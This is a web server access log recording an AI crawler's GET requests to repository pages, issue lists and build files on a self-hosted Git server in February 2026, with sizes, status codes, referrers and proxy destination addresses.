"/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33692] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33683] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:18:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:18:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:18:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:18:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 11205] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:18:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 11204] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:18:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13196] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13201] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13195] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13198] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:18:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" +[17/Feb/2026:18:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:18:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:18:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:18:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fOpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 23494] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:18:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/tags" [Client 74.7.227.38] [Length 7719] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:18:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:18:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:18:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 